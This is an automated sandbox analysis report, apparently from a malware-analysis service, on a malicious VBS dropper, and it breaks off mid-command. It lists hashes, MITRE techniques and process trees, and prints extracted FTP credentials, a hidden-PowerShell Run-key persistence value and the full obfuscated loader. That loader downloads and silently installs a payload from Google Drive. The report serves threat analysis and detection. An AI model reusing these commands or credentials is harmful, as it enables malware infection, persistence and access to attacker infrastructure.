f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 11:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs
Size

689KB
MD5

8fd7c00084879a12a737d7ad5b3c18d8
SHA1

ee92384a30a5765beacf8f902e22e99c9826b781
SHA256

f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73
SHA512

814c7ef16ccf2cea69f3feed9d3bee085cc956e24f48893025f336ce1e7ee6cd945f468ebaa1f22021b8e08c862d2fbd288221f646e799689ad9e1bf758122d5
SSDEEP

1536:VPPPPPPPPPPPPPPPPPPPPPPPE777777777777777777777777777777777777773:xJT0FT2U

Score

10^/10

defense_evasion execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Blocklisted process makes network request 28 IoCs

flow	pid	Process
12	3696	powershell.exe
17	3696	powershell.exe
19	3696	powershell.exe
21	3696	powershell.exe
23	3696	powershell.exe
30	3696	powershell.exe
32	3696	powershell.exe
33	3696	powershell.exe
39	3696	powershell.exe
47	3696	powershell.exe
48	3696	powershell.exe
49	3696	powershell.exe
50	3696	powershell.exe
51	3696	powershell.exe
54	3696	powershell.exe
55	3696	powershell.exe
56	3696	powershell.exe
57	3696	powershell.exe
60	3696	powershell.exe
64	3696	powershell.exe
65	3696	powershell.exe
66	3696	powershell.exe
67	3696	powershell.exe
68	3696	powershell.exe
69	3696	powershell.exe
70	3696	powershell.exe
71	3696	powershell.exe
72	3696	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3152	powershell.exe
3696	powershell.exe
4480	powershell.exe
3884	powershell.exe
4872	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_hxs = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\ojuqb.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3152	powershell.exe
3152	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3884	powershell.exe
4480	powershell.exe
4480	powershell.exe
3884	powershell.exe
4872	powershell.exe
4872	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeDebugPrivilege	4872	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2320 wrote to memory of 3152	2320	WScript.exe	81
PID 2320 wrote to memory of 3152	2320	WScript.exe	81
PID 3152 wrote to memory of 3696	3152	powershell.exe	83
PID 3152 wrote to memory of 3696	3152	powershell.exe	83
PID 3696 wrote to memory of 4480	3696	powershell.exe	88
PID 3696 wrote to memory of 4480	3696	powershell.exe	88
PID 3696 wrote to memory of 3884	3696	powershell.exe	89
PID 3696 wrote to memory of 3884	3696	powershell.exe	89
PID 3696 wrote to memory of 5016	3696	powershell.exe	90
PID 3696 wrote to memory of 5016	3696	powershell.exe	90
PID 3696 wrote to memory of 4872	3696	powershell.exe	91
PID 3696 wrote to memory of 4872	3696	powershell.exe	91
PID 3696 wrote to memory of 4992	3696	powershell.exe	92
PID 3696 wrote to memory of 4992	3696	powershell.exe	92
PID 3696 wrote to memory of 1468	3696	powershell.exe	93
PID 3696 wrote to memory of 1468	3696	powershell.exe	93
PID 3696 wrote to memory of 4808	3696	powershell.exe	97
PID 3696 wrote to memory of 4808	3696	powershell.exe	97
PID 3696 wrote to memory of 976	3696	powershell.exe	98
PID 3696 wrote to memory of 976	3696	powershell.exe	98
PID 3696 wrote to memory of 3284	3696	powershell.exe	99
PID 3696 wrote to memory of 3284	3696	powershell.exe	99
PID 3696 wrote to memory of 4964	3696	powershell.exe	100
PID 3696 wrote to memory of 4964	3696	powershell.exe	100
PID 3696 wrote to memory of 4300	3696	powershell.exe	101
PID 3696 wrote to memory of 4300	3696	powershell.exe	101
PID 3696 wrote to memory of 4040	3696	powershell.exe	102
PID 3696 wrote to memory of 4040	3696	powershell.exe	102
PID 3696 wrote to memory of 220	3696	powershell.exe	104
PID 3696 wrote to memory of 220	3696	powershell.exe	104
PID 3696 wrote to memory of 5028	3696	powershell.exe	105
PID 3696 wrote to memory of 5028	3696	powershell.exe	105
PID 3696 wrote to memory of 3944	3696	powershell.exe	107
PID 3696 wrote to memory of 3944	3696	powershell.exe	107
PID 3696 wrote to memory of 4752	3696	powershell.exe	108
PID 3696 wrote to memory of 4752	3696	powershell.exe	108
PID 3696 wrote to memory of 3020	3696	powershell.exe	109
PID 3696 wrote to memory of 3020	3696	powershell.exe	109
PID 3696 wrote to memory of 4940	3696	powershell.exe	110
PID 3696 wrote to memory of 4940	3696	powershell.exe	110
PID 3696 wrote to memory of 1184	3696	powershell.exe	111
PID 3696 wrote to memory of 1184	3696	powershell.exe	111
PID 3696 wrote to memory of 5100	3696	powershell.exe	112
PID 3696 wrote to memory of 5100	3696	powershell.exe	112
PID 3696 wrote to memory of 4352	3696	powershell.exe	113
PID 3696 wrote to memory of 4352	3696	powershell.exe	113
PID 3696 wrote to memory of 4360	3696	powershell.exe	114
PID 3696 wrote to memory of 4360	3696	powershell.exe	114
PID 3696 wrote to memory of 5092	3696	powershell.exe	115
PID 3696 wrote to memory of 5092	3696	powershell.exe	115
PID 3696 wrote to memory of 436	3696	powershell.exe	116
PID 3696 wrote to memory of 436	3696	powershell.exe	116
PID 3696 wrote to memory of 3672	3696	powershell.exe	117
PID 3696 wrote to memory of 3672	3696	powershell.exe	117
PID 3696 wrote to memory of 1512	3696	powershell.exe	118
PID 3696 wrote to memory of 1512	3696	powershell.exe	118
PID 3696 wrote to memory of 2076	3696	powershell.exe	119
PID 3696 wrote to memory of 2076	3696	powershell.exe	119
PID 3696 wrote to memory of 3640	3696	powershell.exe	120
PID 3696 wrote to memory of 3640	3696	powershell.exe	120
PID 3696 wrote to memory of 2384	3696	powershell.exe	121
PID 3696 wrote to memory of 2384	3696	powershell.exe	121
PID 3696 wrote to memory of 4112	3696	powershell.exe	122
PID 3696 wrote to memory of 4112	3696	powershell.exe	122

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qCybe = 'OwB9せㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしDEせㅚしZQB1せㅚしHIせㅚしdせㅚしせㅚしnせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしGUせㅚしagB3せㅚしHoせㅚしaせㅚしせㅚしkせㅚしCせㅚしせㅚしLせㅚしせㅚしgせㅚしCcせㅚしaせㅚしB0せㅚしHQせㅚしcせㅚしBzせㅚしDoせㅚしLwせㅚしvせㅚしHcせㅚしdwB3せㅚしC4せㅚしbQBlせㅚしGQせㅚしaQBhせㅚしGYせㅚしaQByせㅚしGUせㅚしLgBjせㅚしG8せㅚしbQせㅚしvせㅚしGYせㅚしaQBsせㅚしGUせㅚしLwBkせㅚしGsせㅚしdwB5せㅚしDkせㅚしZせㅚしBzせㅚしHQせㅚしbせㅚしBuせㅚしDUせㅚしYwBhせㅚしGoせㅚしYQせㅚしvせㅚしGEせㅚしZwB1せㅚしC4せㅚしdせㅚしB4せㅚしHQせㅚしLwBmせㅚしGkせㅚしbせㅚしBlせㅚしCcせㅚしIせㅚしせㅚしoせㅚしCせㅚしせㅚしXQBdせㅚしFsせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしG8せㅚしWwせㅚしgせㅚしCwせㅚしIせㅚしBsせㅚしGwせㅚしdQBuせㅚしCQせㅚしIせㅚしせㅚしoせㅚしGUせㅚしawBvせㅚしHYせㅚしbgBJせㅚしC4せㅚしKQせㅚしgせㅚしCcせㅚしSQBWせㅚしEYせㅚしcgBwせㅚしCcせㅚしIせㅚしせㅚしoせㅚしGQせㅚしbwBoせㅚしHQせㅚしZQBNせㅚしHQせㅚしZQBHせㅚしC4せㅚしKQせㅚしnせㅚしDEせㅚしcwBzせㅚしGEせㅚしbせㅚしBDせㅚしC4せㅚしMwB5せㅚしHIせㅚしYQByせㅚしGIせㅚしaQBMせㅚしHMせㅚしcwBhせㅚしGwせㅚしQwせㅚしnせㅚしCgせㅚしZQBwせㅚしHkせㅚしVせㅚしB0せㅚしGUせㅚしRwせㅚしuせㅚしCkせㅚしIせㅚしB4せㅚしG0せㅚしegBYせㅚしHgせㅚしJせㅚしせㅚしgせㅚしCgせㅚしZせㅚしBhせㅚしG8せㅚしTせㅚしせㅚしuせㅚしG4せㅚしaQBhせㅚしG0せㅚしbwBEせㅚしHQせㅚしbgBlせㅚしHIせㅚしcgB1せㅚしEMせㅚしOgせㅚし6せㅚしF0せㅚしbgBpせㅚしGEせㅚしbQBvせㅚしEQせㅚしcせㅚしBwせㅚしEEせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしDsせㅚしKQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしEEせㅚしJwせㅚしgせㅚしCwせㅚしIせㅚしせㅚしnせㅚしJMhOgCTIScせㅚしIせㅚしせㅚしoせㅚしGUせㅚしYwBhせㅚしGwせㅚしcせㅚしBlせㅚしFIせㅚしLgBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚしgせㅚしCgせㅚしZwBuせㅚしGkせㅚしcgB0せㅚしFMせㅚしNせㅚしせㅚし2せㅚしGUせㅚしcwBhせㅚしEIせㅚしbQBvせㅚしHIせㅚしRgせㅚし6せㅚしDoせㅚしXQB0せㅚしHIせㅚしZQB2せㅚしG4せㅚしbwBDせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしB4せㅚしG0せㅚしegBYせㅚしHgせㅚしJせㅚしせㅚしgせㅚしF0せㅚしXQBbせㅚしGUせㅚしdせㅚしB5せㅚしEIせㅚしWwせㅚし7せㅚしCcせㅚしJQBJせㅚしGgせㅚしcQBSせㅚしFgせㅚしJQせㅚしnせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGUせㅚしagB3せㅚしHoせㅚしaせㅚしせㅚしkせㅚしDsせㅚしKQせㅚしgせㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしCせㅚしせㅚしKせㅚしBnせㅚしG4せㅚしaQByせㅚしHQせㅚしUwBkせㅚしGEせㅚしbwBsせㅚしG4せㅚしdwBvせㅚしEQせㅚしLgBRせㅚしFgせㅚしYQBTせㅚしEMせㅚしJせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBuせㅚしFoせㅚしdwBBせㅚしEcせㅚしJせㅚしせㅚし7せㅚしDgせㅚしRgBUせㅚしFUせㅚしOgせㅚし6せㅚしF0せㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしdせㅚしB4せㅚしGUせㅚしVせㅚしせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZwBuせㅚしGkせㅚしZせㅚしBvせㅚしGMせㅚしbgBFせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚしpせㅚしHQせㅚしbgBlせㅚしGkせㅚしbせㅚしBDせㅚしGIせㅚしZQBXせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしIせㅚしB0せㅚしGMせㅚしZQBqせㅚしGIせㅚしTwせㅚしtせㅚしHcせㅚしZQBOせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚしpせㅚしCgせㅚしZQBzせㅚしG8せㅚしcせㅚしBzせㅚしGkせㅚしZせㅚしせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQせㅚしgせㅚしCcせㅚしdせㅚしB4せㅚしHQせㅚしLgせㅚしxせㅚしDせㅚしせㅚしTせㅚしBMせㅚしEQせㅚしLwせㅚしxせㅚしDせㅚしせㅚしLwByせㅚしGUせㅚしdせㅚしBwせㅚしHkせㅚしcgBjせㅚしHせㅚしせㅚしVQせㅚしvせㅚしHIせㅚしYgせㅚしuせㅚしG0せㅚしbwBjせㅚしC4せㅚしdせㅚしBhせㅚしHIせㅚしYgB2せㅚしGsせㅚしYwBzせㅚしGUせㅚしZせㅚしせㅚしuせㅚしHせㅚしせㅚしdせㅚしBmせㅚしEせㅚしせㅚしMQB0せㅚしGEせㅚしcgBiせㅚしHYせㅚしawBjせㅚしHMせㅚしZQBkせㅚしC8せㅚしLwせㅚし6せㅚしHせㅚしせㅚしdせㅚしBmせㅚしCcせㅚしIせㅚしせㅚしoせㅚしGcせㅚしbgBpせㅚしHIせㅚしdせㅚしBTせㅚしGQせㅚしYQBvせㅚしGwせㅚしbgB3せㅚしG8せㅚしRせㅚしせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしCせㅚしせㅚしPQせㅚしgせㅚしG4せㅚしWgB3せㅚしEEせㅚしRwせㅚしkせㅚしDsせㅚしKQせㅚしnせㅚしEせㅚしせㅚしQせㅚしBwせㅚしEoせㅚしOせㅚしせㅚし3せㅚしDUせㅚしMQせㅚしyせㅚしG8せㅚしcgBwせㅚしHIせㅚしZQBwせㅚしG8せㅚしbせㅚしBlせㅚしHYせㅚしZQBkせㅚしCcせㅚしLせㅚしせㅚしnせㅚしDEせㅚしdせㅚしBhせㅚしHIせㅚしYgB2せㅚしGsせㅚしYwBzせㅚしGUせㅚしZせㅚしせㅚしnせㅚしCgせㅚしbせㅚしBhせㅚしGkせㅚしdせㅚしBuせㅚしGUせㅚしZせㅚしBlせㅚしHIせㅚしQwBrせㅚしHIせㅚしbwB3せㅚしHQせㅚしZQBOせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBvせㅚしC0せㅚしdwBlせㅚしG4せㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしcwBsせㅚしGEせㅚしaQB0せㅚしG4せㅚしZQBkせㅚしGUせㅚしcgBDせㅚしC4せㅚしUQBYせㅚしGEせㅚしUwBDせㅚしCQせㅚしOwせㅚし4せㅚしEYせㅚしVせㅚしBVせㅚしDoせㅚしOgBdせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしHQせㅚしeせㅚしBlせㅚしFQせㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGcせㅚしbgBpせㅚしGQせㅚしbwBjせㅚしG4せㅚしRQせㅚしuせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしKQB0せㅚしG4せㅚしZQBpせㅚしGwせㅚしQwBiせㅚしGUせㅚしVwせㅚしuせㅚしHQせㅚしZQBOせㅚしCせㅚしせㅚしdせㅚしBjせㅚしGUせㅚしagBiせㅚしE8せㅚしLQB3せㅚしGUせㅚしTgせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしFEせㅚしWせㅚしBhせㅚしFMせㅚしQwせㅚしkせㅚしDsせㅚしbgBaせㅚしHcせㅚしQQBHせㅚしCQせㅚしOwせㅚしyせㅚしDEせㅚしcwBsせㅚしFQせㅚしOgせㅚし6せㅚしF0せㅚしZQBwせㅚしHkせㅚしVせㅚしBsせㅚしG8せㅚしYwBvせㅚしHQせㅚしbwByせㅚしFせㅚしせㅚしeQB0せㅚしGkせㅚしcgB1せㅚしGMせㅚしZQBTせㅚしC4せㅚしdせㅚしBlせㅚしE4せㅚしLgBtせㅚしGUせㅚしdせㅚしBzせㅚしHkせㅚしUwBbせㅚしCせㅚしせㅚしPQせㅚしgせㅚしGwせㅚしbwBjせㅚしG8せㅚしdせㅚしBvせㅚしHIせㅚしUせㅚしB5せㅚしHQせㅚしaQByせㅚしHUせㅚしYwBlせㅚしFMせㅚしOgせㅚし6せㅚしF0せㅚしcgBlせㅚしGcせㅚしYQBuせㅚしGEせㅚしTQB0せㅚしG4せㅚしaQBvせㅚしFせㅚしせㅚしZQBjせㅚしGkせㅚしdgByせㅚしGUせㅚしUwせㅚしuせㅚしHQせㅚしZQBOせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚし7せㅚしH0せㅚしZQB1せㅚしHIせㅚしdせㅚしせㅚしkせㅚしHsせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしawBjせㅚしGEせㅚしYgBsせㅚしGwせㅚしYQBDせㅚしG4せㅚしbwBpせㅚしHQせㅚしYQBkせㅚしGkせㅚしbせㅚしBhせㅚしFYせㅚしZQB0せㅚしGEせㅚしYwBpせㅚしGYせㅚしaQB0せㅚしHIせㅚしZQBDせㅚしHIせㅚしZQB2せㅚしHIせㅚしZQBTせㅚしDoせㅚしOgBdせㅚしHIせㅚしZQBnせㅚしGEせㅚしbgBhせㅚしE0せㅚしdせㅚしBuせㅚしGkせㅚしbwBQせㅚしGUせㅚしYwBpせㅚしHYせㅚしcgBlせㅚしFMせㅚしLgB0せㅚしGUせㅚしTgせㅚしuせㅚしG0せㅚしZQB0せㅚしHMせㅚしeQBTせㅚしFsせㅚしewせㅚしgせㅚしGUせㅚしcwBsせㅚしGUせㅚしfQせㅚしgせㅚしGYせㅚしLwせㅚしgせㅚしDせㅚしせㅚしIせㅚしB0せㅚしC8せㅚしIせㅚしByせㅚしC8せㅚしIせㅚしBlせㅚしHgせㅚしZQせㅚしuせㅚしG4せㅚしdwBvせㅚしGQせㅚしdせㅚしB1せㅚしGgせㅚしcwせㅚしgせㅚしDsせㅚしJwせㅚしwせㅚしDgせㅚしMQせㅚしgせㅚしHせㅚしせㅚしZQBlせㅚしGwせㅚしcwせㅚしnせㅚしCせㅚしせㅚしZせㅚしBuせㅚしGEせㅚしbQBtせㅚしG8せㅚしYwせㅚしtせㅚしCせㅚしせㅚしZQB4せㅚしGUせㅚしLgBsせㅚしGwせㅚしZQBoせㅚしHMせㅚしcgBlせㅚしHcせㅚしbwBwせㅚしDsせㅚしIせㅚしBlせㅚしGMせㅚしcgBvせㅚしGYせㅚしLQせㅚしgせㅚしCkせㅚしIせㅚしせㅚしnせㅚしHせㅚしせㅚしdQB0せㅚしHIせㅚしYQB0せㅚしFMせㅚしXせㅚしBzせㅚしG0せㅚしYQByせㅚしGcせㅚしbwByせㅚしFせㅚしせㅚしXせㅚしB1せㅚしG4せㅚしZQBNせㅚしCせㅚしせㅚしdせㅚしByせㅚしGEせㅚしdせㅚしBTせㅚしFwせㅚしcwB3せㅚしG8せㅚしZせㅚしBuせㅚしGkせㅚしVwBcせㅚしHQせㅚしZgBvせㅚしHMせㅚしbwByせㅚしGMせㅚしaQBNせㅚしFwせㅚしZwBuせㅚしGkせㅚしbQBhせㅚしG8せㅚしUgBcせㅚしGEせㅚしdせㅚしBhせㅚしEQせㅚしcせㅚしBwせㅚしEEせㅚしXせㅚしせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしHせㅚしせㅚしdQB0せㅚしHIせㅚしYQB0せㅚしFMせㅚしZせㅚしBsせㅚしG8せㅚしRgせㅚしkせㅚしCせㅚしせㅚしKせㅚしせㅚしgせㅚしG4せㅚしbwBpせㅚしHQせㅚしYQBuせㅚしGkせㅚしdせㅚしBzせㅚしGUせㅚしRせㅚしせㅚしtせㅚしCせㅚしせㅚしJwせㅚしlせㅚしEkせㅚしaせㅚしBxせㅚしFIせㅚしWせㅚしせㅚしlせㅚしCcせㅚしIせㅚしBtせㅚしGUせㅚしdせㅚしBJせㅚしC0せㅚしeQBwせㅚしG8せㅚしQwせㅚしgせㅚしDsせㅚしIせㅚしB0せㅚしHIせㅚしYQB0せㅚしHMせㅚしZQByせㅚしG8せㅚしbgせㅚしvせㅚしCせㅚしせㅚしdせㅚしBlせㅚしGkせㅚしdQBxせㅚしC8せㅚしIせㅚしBlせㅚしGwせㅚしaQBmせㅚしCQせㅚしIせㅚしBlせㅚしHgせㅚしZQせㅚしuせㅚしGEせㅚしcwB1せㅚしHcせㅚしIせㅚしBlせㅚしHgせㅚしZQせㅚしuせㅚしGwせㅚしbせㅚしBlせㅚしGgせㅚしcwByせㅚしGUせㅚしdwBvせㅚしHせㅚしせㅚしIせㅚしせㅚし7せㅚしCkせㅚしJwB1せㅚしHMせㅚしbQせㅚしuせㅚしG4せㅚしaQB3せㅚしHせㅚしせㅚしVQBcせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしYQB0せㅚしHMせㅚしYQBwせㅚしCQせㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBlせㅚしGwせㅚしaQBmせㅚしCQせㅚしOwせㅚしpせㅚしCせㅚしせㅚしZQBtせㅚしGEせㅚしTgByせㅚしGUせㅚしcwBVせㅚしDoせㅚしOgBdせㅚしHQせㅚしbgBlせㅚしG0せㅚしbgBvせㅚしHIせㅚしaQB2せㅚしG4せㅚしRQBbせㅚしCせㅚしせㅚしKwせㅚしgせㅚしCcせㅚしXせㅚしBzせㅚしHIせㅚしZQBzせㅚしFUせㅚしXせㅚしせㅚし6せㅚしEMせㅚしJwせㅚしoせㅚしCせㅚしせㅚしPQせㅚしgせㅚしHせㅚしせㅚしdQB0せㅚしHIせㅚしYQB0せㅚしFMせㅚしZせㅚしBsせㅚしG8せㅚしRgせㅚしkせㅚしDsせㅚしKQせㅚしnせㅚしHUせㅚしcwBtせㅚしC4せㅚしbgBpせㅚしHcせㅚしcせㅚしBVせㅚしFwせㅚしJwせㅚしgせㅚしCsせㅚしIせㅚしBhせㅚしHQせㅚしcwBhせㅚしHせㅚしせㅚしJせㅚしせㅚしgせㅚしCwせㅚしQgBLせㅚしEwせㅚしUgBVせㅚしCQせㅚしKせㅚしBlせㅚしGwせㅚしaQBGせㅚしGQせㅚしYQBvせㅚしGwせㅚしbgB3せㅚしG8せㅚしRせㅚしせㅚしuせㅚしFせㅚしせㅚしdwBqせㅚしHMせㅚしagせㅚしkせㅚしDsせㅚしOせㅚしBGせㅚしFQせㅚしVQせㅚし6せㅚしDoせㅚしXQBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgB0せㅚしHgせㅚしZQBUせㅚしC4せㅚしbQBlせㅚしHQせㅚしcwB5せㅚしFMせㅚしWwせㅚしgせㅚしD0せㅚしIせㅚしBnせㅚしG4せㅚしaQBkせㅚしG8せㅚしYwBuせㅚしEUせㅚしLgBQせㅚしHcせㅚしagBzせㅚしGoせㅚしJせㅚしせㅚし7せㅚしCkせㅚしdせㅚしBuせㅚしGUせㅚしaQBsせㅚしEMせㅚしYgBlせㅚしFcせㅚしLgB0せㅚしGUせㅚしTgせㅚしgせㅚしHQせㅚしYwBlせㅚしGoせㅚしYgBPせㅚしC0せㅚしdwBlせㅚしE4せㅚしKせㅚしせㅚしgせㅚしD0せㅚしIせㅚしBQせㅚしHcせㅚしagBzせㅚしGoせㅚしJせㅚしせㅚし7せㅚしH0せㅚしOwせㅚしgせㅚしCkせㅚしJwByせㅚしGcせㅚしOせㅚしBEせㅚしDcせㅚしbwBSせㅚしHMせㅚしZgBWせㅚしGMせㅚしcgせㅚしyせㅚしG4せㅚしQQBoせㅚしGYせㅚしaせㅚしBWせㅚしDYせㅚしRせㅚしBDせㅚしHgせㅚしUgBxせㅚしG4せㅚしcQBqせㅚしDUせㅚしagByせㅚしGIせㅚしMQせㅚしnせㅚしCせㅚしせㅚしKwせㅚしgせㅚしGUせㅚしbせㅚしBUせㅚしFEせㅚしWせㅚしせㅚしkせㅚしCgせㅚしIせㅚしせㅚし9せㅚしCせㅚしせㅚしZQBsせㅚしFQせㅚしUQBYせㅚしCQせㅚしewせㅚしgせㅚしGUせㅚしcwBsせㅚしGUせㅚしfQせㅚし7せㅚしCせㅚしせㅚしKQせㅚしnせㅚしHgせㅚしNせㅚしBmせㅚしGgせㅚしWgBNせㅚしHcせㅚしTgせㅚし3せㅚしFUせㅚしZQBfせㅚしDせㅚしせㅚしXwせㅚし1せㅚしF8せㅚしaQBjせㅚしHMせㅚしYgBoせㅚしDcせㅚしQwBQせㅚしDせㅚしせㅚしSQBmせㅚしFせㅚしせㅚしZせㅚしBBせㅚしDIせㅚしMQせㅚしxせㅚしCcせㅚしIせㅚしせㅚしrせㅚしCせㅚしせㅚしZQBsせㅚしFQせㅚしUQBYせㅚしCQせㅚしKせㅚしせㅚしgAD0AIABlAGwAVABRAFgAJAB7ACAAKQByAGUAVgBuAGkAVwAkACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHIAZQBWAG4AaQBXACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAGUAbABUAFEAWせㅚしAkADsAKQAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABhAHQAcwBhAHAAJAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGEAdABzAGEAcAAkAHsAIAApAHIAZQB3AG8AcAByAGUAVgAkACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIAByAGUAdwBvAHAAcgBlAFYAJAAgADsA';$GBekT = $qCybe.replace('せㅚし' , 'A') ;$QlmBo = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $GBekT ) ); $QlmBo = $QlmBo[-1..-$QlmBo.Length] -join '';$QlmBo = $QlmBo.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs');powershell $QlmBo
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Verpower = $host.Version.Major.Equals(2) ;if ($Verpower) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$XQTle = 'https://drive.google.com/uc?export=download&id=';$WinVer = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ($WinVer) {$XQTle = ($XQTle + '112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$XQTle = ($XQTle + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$jsjwP = (New-Object Net.WebClient);$jsjwP.Encoding = [System.Text.Encoding]::UTF8;$jsjwP.DownloadFile($URLKB, $pasta + '\Upwin.msu');$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\f40405b25286ec40c39bfadf2e70ce5d102d4dd5a8309a5c1b7d1c710e1efb73.vbs' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start 